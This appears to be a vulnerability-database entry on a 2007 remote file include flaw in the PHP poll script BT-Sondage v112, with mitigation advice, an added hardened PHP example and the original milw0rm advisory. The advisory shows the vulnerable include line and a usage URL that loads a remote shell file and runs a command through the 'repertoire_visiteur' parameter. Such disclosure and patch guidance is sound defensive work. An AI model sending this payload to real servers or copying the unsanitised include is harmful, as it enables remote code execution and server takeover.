vendor: BT-Sondage
by: Crackers_Child
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: BT-Sondage
Affected Version From: BT-Sondage v112
Affected Version To: BT-Sondage v112
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

BT-Sondage-v112 Remote File Include Vulnerability

The BT-Sondage-v112 application is affected by a remote file include vulnerability. The vulnerability exists in the gestion_sondage.php file, where an attacker can include a malicious file via the 'repertoire_visiteur' parameter. This can lead to remote code execution and unauthorized access to the server.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the patch provided by the vendor or update to a patched version of the BT-Sondage application. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
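As an added example, not code from the advisory or from BT-Sondage, the include pattern described above next to a hardened form: the request supplies only a short key, the directory comes from a fixed allowlist, and the resolved path is checked to stay under the application root. The advisory's defined() check is read here as a direct-access guard; on its own it does not stop the include from following a request-controlled prefix, so the allowlist is the part that closes the hole. The constant name is the advisory's; $allowed_dirs, resolve_visitor_dir() and the directory layout are assumptions.

```php
<?php
// Added example, not BT-Sondage's own code. The constant name is the one the
// advisory sketches; $allowed_dirs, resolve_visitor_dir() and the directory
// layout are assumptions. Runtime hardening that applies regardless of this
// code: allow_url_include=Off in php.ini keeps include() from loading URLs.

// Direct-access guard: the entry script defines the constant before including
// this file, so a request that reaches the file directly stops here.
if (!defined('_GESTION_SONDAGE_PHP')) {
    http_response_code(403);
    exit('Direct access not allowed');
}

// Vulnerable pattern (as reported): the include path starts with raw request
// input, so a URL or traversal string decides which file gets executed.
//   include($repertoire_visiteur . 'utilitaires/affichage_formulaire.php');

// Hardened form: the request carries only a short key, the directory comes from
// a fixed map, and the resolved path must lie under the application root.
function resolve_visitor_dir(string $key, array $allowed_dirs, string $app_root): ?string
{
    if (!isset($allowed_dirs[$key])) {
        return null;                          // unknown key: include nothing
    }
    $root = realpath($app_root);
    $real = realpath($app_root . '/' . $allowed_dirs[$key]);
    if ($root === false || $real === false) {
        return null;                          // directory does not exist
    }
    // Compare with a trailing separator so /var/www/app-evil does not pass as
    // a child of /var/www/app.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;                          // escaped the application root
    }
    return $real . DIRECTORY_SEPARATOR;
}

$allowed_dirs = ['default' => 'visiteur', 'mobile' => 'visiteur_mobile']; // assumed
$key = $_GET['repertoire_visiteur'] ?? 'default';
$dir = resolve_visitor_dir($key, $allowed_dirs, dirname(__DIR__));
if ($dir === null) {
    http_response_code(400);
    exit('Invalid directory selection');
}
include $dir . 'utilitaires/affichage_formulaire.php';
```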
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------


Title : BT-Sondage-v112 Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: localexploit@hotmail.com

--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  BT-Sondage
URL :  http://www.phpscripts-fr.net/scripts/download.php?id=1575

--------------------------------------------------------------------------------


dork        : Download Script :)
Exploit     :

--------------------------------------------------------------------------------

Vulnerable code in gestion_sondage.php


include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For a patch, add:

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{
    exit; /* body not in the original advisory; assumed: stop when the file is reached directly */
}

--------------------------------------------------------------------------------


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


--------------------------------------------------------------------------------

greets: EveryBody :=)

--------------------------------------------------------------------------------

Note : An angel on one side, a devil on the other, my head is a dungeon; help me, my God, help :(

--------------------------------------------------------------------------------

# milw0rm.com [2007-04-01]